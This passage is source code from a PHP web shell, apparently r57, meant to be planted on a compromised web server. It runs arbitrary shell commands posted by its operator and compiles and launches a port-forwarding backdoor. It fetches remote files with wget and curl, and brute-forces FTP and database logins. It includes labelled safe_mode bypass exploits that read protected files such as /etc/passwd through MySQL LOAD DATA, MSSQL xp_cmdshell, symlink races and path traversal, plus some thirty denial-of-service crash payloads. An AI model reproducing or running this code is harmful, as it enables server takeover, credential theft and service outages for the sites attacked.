4904 $blah = ex('gcc -o '.$tempdir.'dpc '.$tempdir.'dpc.c');
4905
4906 @unlink($tempdir.'dpc.c');
4907
4908 $blah = ex($tempdir.'dpc '.$_POST['local_port'].' '.$_POST['remote_port'].' '.$_POST['remote_host'].' &');
4909
4910 @unlink($tempdir.'dpc');
4911
4912 $_POST['cmd']="ps -aux | grep dpc";
4913
4914}
4915
4916
4917
4918if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
4919
4920
4921
4922for($upl=0;$upl<=16;$upl++)
4923
4924{
4925
4926 if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){
4927
4928 if(!empty($_POST['new_name']) && ($upl==0)) { $nfn = $_POST['new_name']; }
4929
4930 else { $nfn = $HTTP_POST_FILES['userfile'.$upl]['name']; }
4931
4932 @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn)
4933
4934 or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>");
4935
4936 }
4937
4938}
4939
4940
4941
4942if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
4943
4944{
4945
4946 switch($_POST['with'])
4947
4948 {
4949
4950 case 'fopen':
4951
4952 $datafile = @implode("", @file($_POST['rem_file']));
4953
4954 if($datafile)
4955
4956 {
4957
4958 if(!morewrite($_POST['loc_file'],$datafile)){ err(0);};
4959
4960 }
4961
4962
4963
4964 $_POST['cmd'] = '';
4965
4966 break;
4967
4968 case 'wget':
4969
4970 $_POST['cmd'] = which('wget')." \"".$_POST['rem_file']."\" -O \"".$_POST['loc_file']."\"";
4971
4972 break;
4973
4974 case 'fetch':
4975
4976 $_POST['cmd'] = which('fetch')." -p \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\"";
4977
4978 break;
4979
4980 case 'lynx':
4981
4982 $_POST['cmd'] = which('lynx')." -source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\"";
4983
4984 break;
4985
4986 case 'links':
4987
4988 $_POST['cmd'] = which('links')." -source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\"";
4989
4990 break;
4991
4992 case 'GET':
4993
4994 $_POST['cmd'] = which('GET')." \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\"";
4995
4996 break;
4997
4998 case 'curl':
4999
5000 $_POST['cmd'] = which('curl')." \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\"";
5001
5002 break;
5003
5004 }
5005
5006}
5007
5008if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_file_up") || ($_POST['cmd']=="ftp_file_down")))
5009
5010 {
5011
5012 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
5013
5014 if(empty($ftp_port)) { $ftp_port = 21; }
5015
5016 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
5017
5018 if(!$connection) { err(3); }
5019
5020 else
5021
5022 {
5023
5024 if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
5025
5026 else
5027
5028 {
5029
5030 if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);}
5031
5032 if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);}
5033
5034 }
5035
5036 }
5037
5038 @ftp_close($connection);
5039
5040 $_POST['cmd'] = "";
5041
5042 }
5043
5044
5045
5046if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_brute") || ($_POST['cmd']=="db_brute")))
5047
5048 {
5049
5050 if($_POST['cmd']=="ftp_brute"){
5051
5052 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
5053
5054 if(empty($ftp_port)) { $ftp_port = 21; }
5055
5056 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
5057
5058 }else if($_POST['cmd']=="db_brute"){
5059
5060 $connection = 1;
5061
5062 }
5063
5064 if(!$connection) { err(3); $_POST['cmd'] = ""; }
5065
5066 else if(($_POST['brute_method']=='passwd') && (!$users=get_users('/etc/passwd'))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
5067
5068 else if(($_POST['brute_method']=='dic') && (!$users=get_users($_POST['dictionary']))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
5069
5070 if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);}
5071
5072 }
5073
5074
5075
5076echo $table_up3;
5077
5078if (empty($_POST['cmd']) && !$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
5079
5080else if(empty($_POST['cmd']) && $safe_mode){ $_POST['cmd']="safe_dir"; }
5081
5082echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
5083
5084if($safe_mode || $open_basedir)
5085
5086{
5087
5088 switch($_POST['cmd'])
5089
5090 {
5091
5092 case 'safe_dir':
5093
5094
5095
5096 if (@function_exists('scandir') && ($d=@scandir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
5097
5098 {
5099
5100 foreach ($d as $file)
5101
5102 {
5103
5104 if ($file=="." || $file=="..") continue;
5105
5106 @clearstatcache();
5107
5108 @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
5109
5110 if(!$unix){
5111
5112 echo date("d.m.Y H:i",$mtime);
5113
5114 if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
5115
5116 }
5117
5118 else{
5119
5120 if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
5121
5122 $owner = @posix_getpwuid($uid);
5123
5124 $grgid = @posix_getgrgid($gid);
5125
5126 }else{$owner['name']=$grgid['name']='';}
5127
5128 echo $inode." ";
5129
5130 echo perms(@fileperms($file));
5131
5132 @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
5133
5134 echo @date("d.m.Y H:i ",$mtime);
5135
5136 }
5137
5138 echo "$file\n";
5139
5140 }
5141
5142 }
5143
5144
5145
5146 elseif (@function_exists('dir') && ($d=@dir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
5147
5148 {
5149
5150 while (false!==($file=$d->read()))
5151
5152 {
5153
5154 if ($file=="." || $file=="..") continue;
5155
5156 @clearstatcache();
5157
5158 @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
5159
5160 if(!$unix){
5161
5162 echo date("d.m.Y H:i",$mtime);
5163
5164 if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
5165
5166 }
5167
5168 else{
5169
5170 if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
5171
5172 $owner = @posix_getpwuid($uid);
5173
5174 $grgid = @posix_getgrgid($gid);
5175
5176 }else{$owner['name']=$grgid['name']='';}
5177
5178 echo $inode." ";
5179
5180 echo perms(@fileperms($file));
5181
5182 @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
5183
5184 echo @date("d.m.Y H:i ",$mtime);
5185
5186 }
5187
5188 echo "$file\n";
5189
5190 }
5191
5192 $d->close();
5193
5194 }
5195
5196
5197
5198 elseif (@function_exists('opendir') && @function_exists('readdir') && ($d=@opendir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
5199
5200 {
5201
5202 while (false!==($file=@readdir($d)))
5203
5204 {
5205
5206 if ($file=="." || $file=="..") continue;
5207
5208 @clearstatcache();
5209
5210 @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
5211
5212 if(!$unix){
5213
5214 echo date("d.m.Y H:i",$mtime);
5215
5216 if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
5217
5218 }
5219
5220 else{
5221
5222 if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
5223
5224 $owner = @posix_getpwuid($uid);
5225
5226 $grgid = @posix_getgrgid($gid);
5227
5228 }else{$owner['name']=$grgid['name']='';}
5229
5230 echo $inode." ";
5231
5232 echo perms(@fileperms($file));
5233
5234 @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
5235
5236 echo @date("d.m.Y H:i ",$mtime);
5237
5238 }
5239
5240 echo "$file\n";
5241
5242 }
5243
5244 @closedir($d);
5245
5246 }
5247
5248
5249
5250 elseif(@function_exists('glob') && (isset($_POST['glob']) || !isset($_POST['realpath'])))
5251
5252 {
5253
5254 echo "PHP glob() listing directory Safe_mode bypass Exploit\r\n\r\n";
5255
5256 function eh($errno, $errstr, $errfile, $errline)
5257
5258 {
5259
5260 global $D, $c, $i;
5261
5262 preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
5263
5264 if($o){ $D[$c] = $o[2]; $c++;}
5265
5266 }
5267
5268 $error_reporting = @ini_get('error_reporting');
5269
5270 error_reporting(E_WARNING);
5271
5272 @ini_set("display_errors", 1);
5273
5274 @ini_alter("display_errors", 1);
5275
5276 $root = "/";
5277
5278 if($dir) $root = $dir;
5279
5280 $c = 0; $D = array();
5281
5282 @set_error_handler("eh");
5283
5284 $chars = "_-.0123456789abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
5285
5286 for($i=0; $i < strlen($chars); $i++)
5287
5288 {
5289
5290 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
5291
5292 $prevD = $D[count($D)-1];
5293
5294 @glob($path."*");
5295
5296 if($D[count($D)-1] != $prevD)
5297
5298 {
5299
5300 for($j=0; $j < strlen($chars); $j++)
5301
5302 {
5303
5304 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
5305
5306 $prevD2 = $D[count($D)-1];
5307
5308 @glob($path."*");
5309
5310 if($D[count($D)-1] != $prevD2)
5311
5312 {
5313
5314 for($p=0; $p < strlen($chars); $p++)
5315
5316 {
5317
5318 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
5319
5320 $prevD3 = $D[count($D)-1];
5321
5322 @glob($path."*");
5323
5324 if($D[count($D)-1] != $prevD3)
5325
5326 {
5327
5328 for($r=0; $r < strlen($chars); $r++)
5329
5330 {
5331
5332 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
5333
5334 @glob($path."*");
5335
5336 }
5337
5338 }
5339
5340 }
5341
5342 }
5343
5344 }
5345
5346 }
5347
5348 }
5349
5350 $D = array_unique($D);
5351
5352 foreach($D as $item) echo "{$item}\r\n";
5353
5354 echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n";
5355
5356 error_reporting($error_reporting);
5357
5358 }
5359
5360 elseif(@function_exists('realpath') && (!isset($_POST['glob']) || isset($_POST['realpath'])))
5361
5362 {
5363
5364 echo "PHP realpath() listing directory Safe_mode bypass Exploit\r\n\r\n";
5365
5366 if(!$dir){$dir='/etc/';};
5367
5368 if(!empty($_POST['end_rlph'])){$end_rlph=$_POST['end_rlph'];}else{$end_rlph='';}
5369
5370 if(!empty($_POST['n_rlph'])){$n_rlph=$_POST['n_rlph'];}else{$n_rlph='3';}
5371
5372
5373
5374 if($realpath=realpath($dir.'/')){echo $realpath."\r\n";}
5375
5376 if($end_rlph!='' && $realpath=realpath($dir.'/'.$end_rlph)){echo $realpath."\r\n";}
5377
5378 foreach($presets_rlph as $preset_rlph){
5379
5380 if($realpath=realpath($dir.'/'.$preset_rlph.$end_rlph)){echo $realpath."\r\n";}
5381
5382 }
5383
5384 for($i=0; $i < strlen($chars_rlph); $i++){
5385
5386 if($realpath=realpath($dir."/{$chars_rlph[$i]}".$end_rlph)){echo $realpath."\r\n";}
5387
5388 if($n_rlph<=1){continue;};
5389
5390 for($j=0; $j < strlen($chars_rlph); $j++){
5391
5392 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}".$end_rlph)){echo $realpath."\r\n";}
5393
5394 if($n_rlph<=2){continue;};
5395
5396 for($x=0; $x < strlen($chars_rlph); $x++){
5397
5398 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}".$end_rlph)){echo $realpath."\r\n";}
5399
5400 if($n_rlph<=3){continue;};
5401
5402 for($y=0; $y < strlen($chars_rlph); $y++){
5403
5404 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}".$end_rlph)){echo $realpath."\r\n";}
5405
5406 if($n_rlph<=4){continue;};
5407
5408 for($z=0; $z < strlen($chars_rlph); $z++){
5409
5410 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}".$end_rlph)){echo $realpath."\r\n";}
5411
5412 if($n_rlph<=5){continue;};
5413
5414 for($w=0; $w < strlen($chars_rlph); $w++){
5415
5416 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}{$chars_rlph[$w]}".$end_rlph)){echo $realpath."\r\n";}
5417
5418 }
5419
5420 }
5421
5422 }
5423
5424 }
5425
5426 }
5427
5428 }
5429
5430 echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n";
5431
5432 }
5433
5434 else echo $lang[$language.'_text29'];
5435
5436 break;
5437
5438 case 'test1':
5439
5440 $ci = @curl_init("file://".$_POST['test1_file']);
5441
5442 $cf = @curl_exec($ci);
5443
5444 echo htmlspecialchars($cf);
5445
5446 break;
5447
5448 case 'test2':
5449
5450 @include($_POST['test2_file']);
5451
5452 break;
5453
5454 case 'test3':
5455
5456 if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
5457
5458 $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
5459
5460 if($db)
5461
5462 {
5463
5464 if(@mysql_select_db($_POST['test3_md'],$db))
5465
5466 {
5467
5468 @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
5469
5470 @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
5471
5472/* @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");*/
5473
5474 @mysql_query("LOAD DATA LOCAL INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
5475
5476 $r = @mysql_query("SELECT * FROM temp_r57_table");
5477
5478 while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }
5479
5480 @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
5481
5482 }
5483
5484 else echo "[-] ERROR! Can't select database";
5485
5486 @mysql_close($db);
5487
5488 }
5489
5490 else echo "[-] ERROR! Can't connect to mysql server";
5491
5492 break;
5493
5494 case 'test4':
5495
5496 if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
5497
5498 $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
5499
5500 if($db)
5501
5502 {
5503
5504 if(@mssql_select_db($_POST['test4_md'],$db))
5505
5506 {
5507
5508 @mssql_query("drop table r57_temp_table",$db);
5509
5510 @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
5511
5512 @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
5513
5514 $res = mssql_query("select * from r57_temp_table",$db);
5515
5516 while(($row=@mssql_fetch_row($res)))
5517
5518 {
5519
5520 echo htmlspecialchars($row[0])."\r\n";
5521
5522 }
5523
5524 @mssql_query("drop table r57_temp_table",$db);
5525
5526 }
5527
5528 else echo "[-] ERROR! Can't select database";
5529
5530 @mssql_close($db);
5531
5532 }
5533
5534 else echo "[-] ERROR! Can't connect to MSSQL server";
5535
5536 break;
5537
5538 case 'test5':
5539
5540 $temp=tempnam($dir, "fname");
5541
5542 if (@file_exists($temp)) @unlink($temp);
5543
5544 $extra = "-C ".$_POST['test5_file']." -X $temp";
5545
5546 @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
5547
5548 $str = moreread($temp);
5549
5550 echo htmlspecialchars($str);
5551
5552 @unlink($temp);
5553
5554 break;
5555
5556 case 'test6':
5557
5558 $stream = @imap_open('/etc/passwd', "", "");
5559
5560 $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
5561
5562 for ($i = 0; $i < count($dir_list); $i++) echo htmlspecialchars($dir_list[$i])."\r\n";
5563
5564 @imap_close($stream);
5565
5566 break;
5567
5568 case 'test7':
5569
5570 $stream = @imap_open($_POST['test7_file'], "", "");
5571
5572 $str = @imap_body($stream, 1);
5573
5574 echo htmlspecialchars($str);
5575
5576 @imap_close($stream);
5577
5578 break;
5579
5580 case 'test8':
5581
5582 $temp=@tempnam($_POST['test8_file2'], "copytemp");
5583
5584 $str = readzlib($_POST['test8_file1'],$temp);
5585
5586 echo htmlspecialchars($str);
5587
5588 @unlink($temp);
5589
5590 break;
5591
5592 case 'test9':
5593
5594 @ini_restore("safe_mode");
5595
5596 @ini_restore("open_basedir");
5597
5598 $str = moreread($_POST['test9_file']);
5599
5600 echo htmlspecialchars($str);
5601
5602 break;
5603
5604 case 'test10':
5605
5606 @ob_clean();
5607
5608 $error_reporting = @ini_get('error_reporting');
5609
5610 error_reporting(E_ALL ^ E_NOTICE);
5611
5612 @ini_set("display_errors", 1);
5613
5614 @ini_alter("display_errors", 1);
5615
5616 $str=@fopen($_POST['test10_file'],"r");
5617
5618 while(!feof($str)){print htmlspecialchars(fgets($str));}
5619
5620 fclose($str);
5621
5622 error_reporting($error_reporting);
5623
5624 break;
5625
5626 case 'test11':
5627
5628 @ob_clean();
5629
5630 $temp = 'zip://'.$_POST['test11_file'];
5631
5632 $str = moreread($temp);
5633
5634 echo htmlspecialchars($str);
5635
5636 break;
5637
5638 case 'test12':
5639
5640 @ob_clean();
5641
5642 $temp = 'compress.bzip2://'.$_POST['test12_file'];
5643
5644 $str = moreread($temp);
5645
5646 echo htmlspecialchars($str);
5647
5648 break;
5649
5650 case 'test13':
5651
5652 @error_log($_POST['test13_file1'], 3, "php://../../../../../../../../../../../".$_POST['test13_file2']);
5653
5654 echo $lang[$language.'_text61'];
5655
5656 break;
5657
5658 case 'test14':
5659
5660 @session_save_path($_POST['test14_file2']."\0;$tempdir");
5661
5662 @session_start();
5663
5664 @$_SESSION[php]=$_POST['test14_file1'];
5665
5666 echo $lang[$language.'_text61'];
5667
5668 break;
5669
5670 case 'test15':
5671
5672 @readfile($_POST['test15_file1'], 3, "php://../../../../../../../../../../../".$_POST['test15_file2']);
5673
5674 echo $lang[$language.'_text61'];
5675
5676 break;
5677
5678 case 'test16':
5679
5680 if (@fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61'];
5681
5682 break;
5683
5684 case 'test17_1':
5685
5686 @unlink('symlinkread');
5687
5688 @symlink('a/a/a/a/a/a/', 'dummy');
5689
5690 @symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'], 'symlinkread');
5691
5692 @unlink('dummy');
5693
5694 while (1)
5695
5696 {
5697
5698 @symlink('.', 'dummy');
5699
5700 @unlink('dummy');
5701
5702 }
5703
5704 break;
5705
5706 case 'test17_2':
5707
5708 $str='';
5709
5710 while (strlen($str) < 3) {
5711
5712/* $str = moreread('symlinkread');*/
5713
5714 $str = @file_get_contents('symlinkread');
5715
5716 if($str){ @ob_clean(); echo htmlspecialchars($str);}
5717
5718 }
5719
5720 break;
5721
5722 case 'test17_3':
5723
5724 $dir = $files = array();
5725
5726 if(@version_compare(@phpversion(),"5.0.0")>=0){
5727
5728 while (@count($dir) < 3) {
5729
5730 $dir=@scandir('symlinkread');
5731
5732 if (@count($dir) > 2) {@ob_clean(); @print_r($dir); }
5733
5734 }
5735
5736 }
5737
5738 else {
5739
5740 while (@count($files) < 3) {
5741
5742 $dh = @opendir('symlinkread');
5743
5744 while (false !== ($filename = @readdir($dh))) {
5745
5746 $files[] = $filename;
5747
5748 }
5749
5750 if(@count($files) > 2){@ob_clean(); @print_r($files); }
5751
5752 }
5753
5754 }
5755
5756 break;
5757
5758 case 'test18':
5759
5760 @putenv("TMPDIR=".$_POST['test18_file2']);
5761
5762 @ini_set("session.save_path", "");
5763
5764 @ini_alter("session.save_path", "");
5765
5766 @session_start();
5767
5768 @$_SESSION[php]=$_POST['test18_file1'];
5769
5770 echo $lang[$language.'_text61'];
5771
5772 break;
5773
5774 case 'test19':
5775
5776 if(empty($_POST['test19_port'])) { $_POST['test19_port'] = "3306"; }
5777
5778 $m = new mysqli('localhost',$_POST['test19_ml'],$_POST['test19_mp'],$_POST['test19_md'],$_POST['test19_port']);
5779
5780 if(@mysqli_connect_errno()){ echo "[-] ERROR! Can't connect to mysqli server: ".mysqli_connect_error() ;};
5781
5782 $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
5783
5784 $m->set_local_infile_handler("r");
5785
5786 $m->query("DROP TABLE IF EXISTS temp_r57_table");
5787
5788 $m->query("CREATE TABLE temp_r57_table ( 'file' LONGBLOB NOT NULL )");
5789
5790 $m->query("LOAD DATA LOCAL INFILE \"".$_POST['test19_file']."\" INTO TABLE temp_r57_table");
5791
5792 $r = $m->query("SELECT * FROM temp_r57_table");
5793
5794 while(($r_sql = @mysqli_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }
5795
5796 $m->query("DROP TABLE IF EXISTS temp_r57_table");
5797
5798 $m->close();
5799
5800 break;
5801
5802 }
5803
5804}
5805
5806
5807
5808if((!$safe_mode) && ($_POST['cmd']!="php_eval") && ($_POST['cmd']!="mysql_dump") && ($_POST['cmd']!="db_query") && ($_POST['cmd']!="ftp_brute") && ($_POST['cmd']!="db_brute")){
5809
5810 $cmd_rep = ex($_POST['cmd']);
5811
5812 if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
5813
5814 else { echo @htmlspecialchars($cmd_rep)."\n"; }
5815
5816}/*elseif($safe_mode){
5817
5818 $cmd_rep = safe_ex($_POST['cmd']);
5819
5820 if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
5821
5822 else { echo @htmlspecialchars($cmd_rep)."\n"; }
5823
5824}
5825
5826*/
5827
5828switch($_POST['cmd'])
5829
5830{
5831
5832 case 'dos1':
5833
5834 function a() { a(); } a();
5835
5836 break;
5837
5838 case 'dos2':
5839
5840 @pack("d4294967297", 2);
5841
5842 break;
5843
5844 case 'dos3':
5845
5846 $a = "a";@unserialize(@str_replace('1', 2147483647, @serialize($a)));
5847
5848 break;
5849
5850 case 'dos4':
5851
5852 $t = array(1);while (1) {$a[] = &$t;};
5853
5854 break;
5855
5856 case 'dos5':
5857
5858 @dl("sqlite.so");$db = new SqliteDatabase("foo");
5859
5860 break;
5861
5862 case 'dos6':
5863
5864 preg_match('/(.(?!b))*/', @str_repeat("a", 10000));
5865
5866 break;
5867
5868 case 'dos7':
5869
5870 @str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538));
5871
5872 break;
5873
5874 case 'dos8':
5875
5876 @shell_exec("killall -11 httpd");
5877
5878 break;
5879
5880 case 'dos9':
5881
5882 function cx(){ @tempnam("/www/", '../../../../../..'.$tempdir.'cx'); cx(); } cx();
5883
5884 break;
5885
5886 case 'dos10':
5887
5888 $a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0);
5889
5890 break;
5891
5892 case 'dos11':
5893
5894 @array_fill(1,123456789,"Infigo-IS");
5895
5896 break;
5897
5898 case 'dos12':
5899
5900 @substr_compare("A","A",12345678);
5901
5902 break;
5903
5904 case 'dos13':
5905
5906 @unserialize("a:2147483649:{");
5907
5908 break;
5909
5910 case 'dos14':
5911
5912 $Data = @str_ireplace("\n", "<br>", $Data);
5913
5914 break;
5915
5916 case 'dos15':
5917
5918 function toUTF($x) {return chr(($x >> 6) + 192) . chr(($x & 63) + 128);}
5919
5920 $str1 = "";for($i=0; $i < 64; $i++){ $str1 .= toUTF(977);}
5921
5922 @htmlentities($str1, ENT_NOQUOTES, "UTF-8");
5923
5924 break;
5925
5926 case 'dos16':
5927
5928 $r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r, $e);
5929
5930 for ($i=0; $i<1000; $i++) $arr[$i]=array(array(""));
5931
5932 unset($arr[600]);@zip_entry_read($e, -1);unset($arr[601]);
5933
5934 break;
5935
5936 case 'dos17':
5937
5938 $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU";
5939
5940 $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD";
5941
5942 $x = "AQ ";
5943
5944 unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x);
5945
5946 break;
5947
5948 case 'dos18':
5949
5950 $MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY, 0600);
5951
5952 if (!@msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err))
5953
5954 echo "Msg not sent because $msg_err\n";
5955
5956 if (@msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) {
5957
5958 echo "$msg\n";
5959
5960 } else { echo "Received $msg_error fetching message\n"; break; }
5961
5962 @msg_remove_queue ($msg_id);
5963
5964 break;
5965
5966 case 'dos19':
5967
5968 $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd"; @fopen($url, "r");
5969
5970 break;
5971
5972 case 'dos20':
5973
5974 $hashtable = str_repeat("A", 39);
5975
5976 $hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08);
5977
5978 $hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99);
5979
5980 $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';
5981
5982 for ($i=0; $i<65535; $i++) { $str .= 'i:0;R:2;'; }
5983
5984 $str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;';
5985
5986 @unserialize($str);
5987
5988 break;
5989
5990 case 'dos21':
5991
5992 imagecreatetruecolor(1234,1073741824);
5993
5994 break;
5995
5996 case 'dos22':
5997
5998 imagecopyresized(imagecreatetruecolor(0x7fffffff, 120),imagecreatetruecolor(120, 120), 0, 0, 0, 0, 0x7fffffff, 120, 120, 120);
5999
6000 break;
6001
6002 case 'dos23':
6003
6004 $a = str_repeat ("A",9989776); $b = str_repeat("/", 2798349); iconv_substr($a,0,1,$b);
6005
6006 break;
6007
6008 case 'dos24':
6009
6010 setlocale(LC_COLLATE, str_repeat("A", 34438013));
6011
6012 break;
6013
6014 case 'dos25':
6015
6016 glob(str_repeat("A", 9638013));
6017
6018 break;
6019
6020 case 'dos26':
6021
6022 glob("a",-1);
6023
6024 break;
6025
6026 case 'dos27':
6027
6028 fnmatch("*[1]e", str_repeat("A", 9638013));
6029
6030 break;
6031
6032 case 'dos28':
6033
6034 if (extension_loaded("gd")){ $buff = str_repeat("A",9999); $res = imagepsloadfont($buff); echo "boom!!\n";}
6035
6036 break;
6037
6038 case 'dos29':
6039
6040 if(function_exists('msql_connect')){ msql_pconnect(str_repeat('A',49424).'BBBB'); msql_connect(str_repeat('A',49424).'BBBB');}
6041
6042 break;
6043
6044 case 'dos30':
6045
6046 $a=str_repeat("A", 65535); $b=1; $c=str_repeat("A", 65535); chunk_split($a,$b,$c);
6047
6048 break;
6049
6050 case 'dos31':
6051
6052 if (extension_loaded("win32std") ) { win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );}
6053
6054 break;
6055
6056 case 'dos32':
6057
6058 if (extension_loaded( "iisfunc" ) ){ $buf_unicode = str_repeat( "A", 256 ); $eip_unicode = "\x41\x41"; iis_getservicestate( $buf_unicode . $eip_unicode );}
6059
6060 break;
6061
6062 case 'dos33':
6063
